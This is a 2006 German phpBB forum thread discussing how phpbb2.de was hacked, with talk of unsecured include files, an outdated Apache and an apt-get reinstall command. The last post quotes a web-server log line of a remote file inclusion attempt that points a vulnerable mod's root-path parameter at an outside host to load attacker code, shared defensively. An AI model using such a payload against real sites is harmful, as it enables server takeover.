phpbb2 hacked ???

Sicherheit des Webservers, der Server und rund um phpBB
Antworten
diegoriv
Beiträge: 314
Registriert: Di 01.Feb, 2005 15:25
Wohnort: Wien
Kontaktdaten:

phpbb2 hacked ???

Beitrag von diegoriv »

Habe eben versucht phpbb2 abzurufen und das Ergebnis ist nicht sonderlich erfreulich.

http://www.phpbb2.de

Hoffentlich erfahren wir, wie das passiert ist. Da war doch der cracker tracker installiert, oder??

edit:// so nebstbei hab ich nämlich seit gestern auch wieder eine mittlere Angriffswelle (keine Vergleich zu oxpus oder cback, aber dennoch genug für meine kleine Seite.
Zuletzt geändert von diegoriv am Di 18.Jul, 2006 07:31, insgesamt 1-mal geändert.
[center]***********************************************************
Alpinum.at - Forum f?r Bergfreunde
***********************************************************[/center]
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Jo aber ungesicherte Include Files und veralteter Apache.
Und ich habs noch gesagt als sie mit dem Server neu installiert haben. ¦4 ¦4
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Nun, der alte Apache ist vom Provider entgegen der Bestellung installiert worden(!), der Rest ist Stephan gewesen, der nicht gehört hatte...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
KaptnIGLO
Beiträge: 93
Registriert: Di 07.Dez, 2004 09:47
Kontaktdaten:

Beitrag von KaptnIGLO »

[quote="cback";p="61935"]Jo aber ungesicherte Include Files und veralteter Apache.
[/quote]

Wie kann ich die sichern? per .htaccess oder gibts im ctracker noch ne Einstellung die ich übersehen habe. Bis auf die phpVersion die noch bei 4.1.1 liegt ist bei mir alles grün.
Zuletzt geändert von KaptnIGLO am Di 18.Jul, 2006 10:53, insgesamt 1-mal geändert.
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Schau mal in Cbacks Blog (Link in seiner SIG). Dort ist alles beschrieben.

Und mein Motto:
Traue keinem MOD, der nicht regelmässig aktualisiert wird, sofern er etwas komplexer ist.
Ich habe daher auch schon so manchen MOD des Boards verbannt; die KB allen voran, da sie neben zahlreichen Bugs auch noch sehr viele Sicherheitslücken hat. Und sooooo dringend brauchte ich die auch nicht ;)
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Titus
Beiträge: 235
Registriert: Fr 18.Mär, 2005 22:23

Beitrag von Titus »

wie heist es so schön "der Schuster hat immer die schlechtesten Leisten" :p

ist der Server eigentlich managed? (da du schreibst entgegen der Bestellung)
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Nein, voller Root. Nur Stephan hatte den zuletzt neu installieren "lassen". War bequemer...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Ich hätt schnell nen neuen Apache gebacken. :)
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Tja, Du, ich, er hat die nur angeschrieben. Und bislang ohne Erfolg...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Öhm o.O Root Server!
Mit Debian sogar?
Wieso dann hoster anschreiben?


Rein in die Konsole,

Code: Alles auswählen

apt-get install apache2-mpm-prefork libapache2-mod-perl2 libapache2-mod-php4 mysql-client-4.1 mysql-server-4.1 libmysqlclient10 libmysqlclient12 libmysqlclient14 php4 php4-cgi php4-cli php4-pear php4-mysql phpmyadmin php4-gd libgd2

fertig ^5


Bzw apt-get update glaub ich für ein Updatevorgang müsste man mal den dafür verwendeten Befehl gucken, bin kein Debian Anwender. :)
Zuletzt geändert von cback am Di 18.Jul, 2006 15:41, insgesamt 2-mal geändert.
Benutzeravatar
Giga4000
Beiträge: 181
Registriert: Sa 26.Nov, 2005 09:19
Wohnort: Hamburg
Kontaktdaten:

Beitrag von Giga4000 »

Seite ist wieder online ;)
Site: www.mx-forums.de - New!
phpBB MODs: Click Here
Benutzeravatar
cback
Beiträge: 1391
Registriert: Sa 15.Mai, 2004 15:32
Wohnort: Saarland
Kontaktdaten:

Beitrag von cback »

Und es war tatsächlich das Modul was Heise.de vermutete :D
Benutzeravatar
Dungeonwatcher
Beiträge: 1055
Registriert: Sa 19.Feb, 2005 01:16
Wohnort: Berlin
Kontaktdaten:

Beitrag von Dungeonwatcher »

Hi große Meister! :cool:

Heute gab's doch tatsächlich diverse Versuche mein Forum mit Hilfe dieses Mods zu hacken. Da ich dieses Modul jedoch nicht nutze, gab's nur 404er Meldungen zurück.
90.Red-81-35-151.dynamicIP.rima-tde.net - - [03/Aug/2006:07:42:55 +0000] "GET /forum/m2f/m2f_forum.php?m2f_root_path=http://xargonu.evonet.ro/htl.html? HTTP/1.0" 404 - "" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.0.1) Gecko/20020823 Netscap"
Die Profis mögen sich mal diese Seite anschauen, welche versucht wurde aufzurufen.

Bye/2
Antworten